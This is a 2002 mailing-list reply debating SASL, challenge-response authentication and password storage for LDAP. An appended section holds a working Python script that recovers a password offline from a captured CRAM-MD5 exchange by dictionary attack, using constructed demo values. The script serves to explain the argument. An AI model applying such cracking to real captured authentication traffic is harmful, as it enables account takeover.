At 1:13 AM -0700 4/10/02, David Wright wrote:

>Since there is such a SASL love-fest going on here, allow me to
>chime in with my dissenting viewpoint. SASL adds nothing but an
>annoying dependency to LDAP. No, I take that back, it also adds a
>security hole.
>
>Challenge-response mechanisms have absolutely no advantage over
>straight password transmission across an SSL/TLS encrypted line. In
>fact, if they run in cleartext, they have a few disadvantages: (1)
>No server certificate authentication. (2) If you watch
>challenge-response a few times, you can get a good deal of the way
>toward decrypting the password.
Putting the password over the wire is always a bad idea. Maybe I'm a
dork for buying into Kerb, but hey, I'm sold, sue me. SASL seems like
the best way to abstract Kerb out to LDAP, Cyrus, etc.

>Furthermore, in order to support multiple authentication mechanisms,
>SASL must store passwords essentially in cleartext (i.e. not in a
>hashed form). That means if anyone ever gets access to your sasldb,
>you are hosed. Not true for an LDAP database, which stores passwords
>in hashed form.

I disagree. Given modern hardware, hashed passwords are 90% (arbitrary
number out of a hat) as dangerous as cleartext ones. MD5 improves on
that a lot (until we get better hardware), but the vast majority of
hashes are by default still crypt.

>The only advantage of a security layer is flexibility: allowing
>authentication via arbitrary backends (LDAP, SQL, passwd, shadow,
>kerberos). While SASL makes this possible in theory, I have not had
>good experiences in trying to make use of this flexibility -- there
>is very little in the way of widely-distributed, well-tested,
>well-supported, drop-in code to do all this stuff.
>
>Finally, Birger, what's "really creative" about
>
> by self write
> by anonymous auth
> by * none

To be fair, I said that.

--
http://www.4am-media.com
Mac OS X Consulting and Training

Michael Bartosh
[EMAIL PROTECTED]
303.517.0272
Denver, CO

"The surest way to corrupt a youth is to instruct him to hold in higher
regard those who think alike than those who think differently."
- -- Nietzsche

Think Different.
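The two claims argued over above (that a cleartext challenge-response exchange lets an observer work toward the password, and that a server verifying such a mechanism has to keep the password in recoverable form rather than as a one-way hash) can both be shown with CRAM-MD5, the challenge-response mechanism SASL commonly offered at the time. The following is an added example, written for this page and not code posted by either participant; the username, password, challenge text and wordlist are all constructed for the demonstration.

```python
# Added example (not from the thread): offline dictionary attack against a
# captured CRAM-MD5 exchange, plus the server-side check that forces the
# verifier to keep the password itself. Username, password, challenge and
# wordlist are constructed for this demonstration.
import base64
import hashlib
import hmac
from typing import Iterable, Optional, Tuple


def cram_md5_response(user: str, password: str, challenge: bytes) -> str:
    """What a CRAM-MD5 client sends (RFC 2195):
    base64("<user> <hex HMAC-MD5(key=password, msg=challenge)>")."""
    digest = hmac.new(password.encode(), challenge, hashlib.md5).hexdigest()
    return base64.b64encode(f"{user} {digest}".encode()).decode()


def server_verify(stored_password: str, challenge: bytes, response_b64: str) -> bool:
    """Server-side check. The server must recompute the HMAC over the
    challenge, so it needs the password (or an equivalent HMAC key) at
    verification time; a salted one-way hash such as crypt(3) cannot be
    used here. This is why a sasldb holds recoverable secrets."""
    user, _, observed = base64.b64decode(response_b64).decode().partition(" ")
    expected = hmac.new(stored_password.encode(), challenge, hashlib.md5).hexdigest()
    return hmac.compare_digest(expected, observed)


# --- Constructed capture: a single exchange as a passive sniffer would see
# it on an unencrypted session. The challenge mimics the "<pid.time@host>"
# form CRAM-MD5 servers send; the password is the attacker's unknown. ---
CAPTURED_CHALLENGE = b"<1896.697170952@postoffice.example.com>"
CAPTURED_CHALLENGE_B64 = base64.b64encode(CAPTURED_CHALLENGE).decode()
CAPTURED_RESPONSE_B64 = cram_md5_response("dwright", "tr0ub4dor", CAPTURED_CHALLENGE)

# Constructed wordlist; a real attack uses a large dictionary plus mangling rules.
WORDLIST = ["password", "letmein", "hunter2", "qwerty", "tr0ub4dor", "correcthorse"]


def parse_capture(challenge_b64: str, response_b64: str) -> Tuple[bytes, str, str]:
    """Split the two base64 wire tokens into (challenge, user, hex digest)."""
    challenge = base64.b64decode(challenge_b64)
    user, _, digest = base64.b64decode(response_b64).decode().partition(" ")
    return challenge, user, digest


def crack_cram_md5(challenge_b64: str, response_b64: str,
                   wordlist: Iterable[str]) -> Optional[str]:
    """Recover the password offline from one captured exchange.

    Each guess costs one HMAC-MD5 and never touches the server, so account
    lockout and rate limiting do not apply. Returns the matching guess, or
    None if the wordlist does not contain the password."""
    challenge, _user, observed = parse_capture(challenge_b64, response_b64)
    for guess in wordlist:
        candidate = hmac.new(guess.encode(), challenge, hashlib.md5).hexdigest()
        if hmac.compare_digest(candidate, observed):
            return guess
    return None


if __name__ == "__main__":
    _, user, _ = parse_capture(CAPTURED_CHALLENGE_B64, CAPTURED_RESPONSE_B64)
    found = crack_cram_md5(CAPTURED_CHALLENGE_B64, CAPTURED_RESPONSE_B64, WORDLIST)
    print(f"user={user} password={found}")
    print("server accepts:", server_verify(found, CAPTURED_CHALLENGE, CAPTURED_RESPONSE_B64))
```

The same capture taken over TLS would show the observer nothing, which is the point of the quoted argument: the challenge-response step buys no secrecy that the encrypted channel does not already provide, while costing the server the ability to store only a one-way hash.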